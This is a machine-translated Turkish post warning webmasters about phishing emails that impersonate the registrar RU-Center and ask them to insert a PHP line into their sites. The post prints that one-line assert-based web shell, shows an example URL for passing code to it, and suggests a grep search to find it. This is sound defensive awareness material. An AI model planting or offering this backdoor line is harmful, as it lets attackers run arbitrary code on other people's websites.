PHP bilmeyen "web yöneticilerinin" dikkatine. Güvenlik açığı.
Bu otomatik bir çeviri.
Özgün dilde yayın okumak için buraya tıklayın.
Bugün bazı arkadaşlarım, iddiaya göre RU-Center'dan (Rus'un en büyük alan adı kayıt şirketi ) — nic.ru'dan aşağıdaki içeriğe sahip mektuplar aldı:
Mektuplar [email protected] adresinden gönderildi. Mektupta, kendilerini RU-Center adına temsil eden saldırganlar, web sitesine aşağıdaki kodu yerleştirmeyi öneriyorlar:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>Ne yazık ki kendilerine "webmaster" (çok sayıda site sahibi) diyen meslektaşlarımızın birçoğu PHP bilmiyor ve yukarıdaki kodun tehlikelerini düşünmüyor. Bu işleve parametre olarak bir dize iletirseniz, bu durumda Asser() tarafından PHP kodu olarak kabul edilecektir! Dikkatli ol!
Assert veya eval komutlarını kullanarak php projelerinizi güvenlik açıkları açısından incelemenizi öneririm. Proje kodunda bu komutlar varsa, panik yapmayın — algoritmalarını inceleyin. Algoritmaların yetkili kullanımı oldukça mümkündür. Yukarıdaki örnekte, komut, saldırganların örneğin RUCENTER parametresini kullanarak sitenizi aramasına izin verecektir — http://sistema-audit.ru/?RUCENTER=PHP-code
Örneğin, şüpheli dosyaların bir listesini almak için, site dosyalarının bulunduğu klasörü belirten grep —i —r 'assert' / home / www / mysite / * linux komutunu kullanarak bir arama yapmanızı öneririz. örnek kod kullanılır.
Kendinize ve sitelerinize iyi bakın!
Bu otomatik bir çeviri.
Özgün dilde yayın okumak için buraya tıklayın.
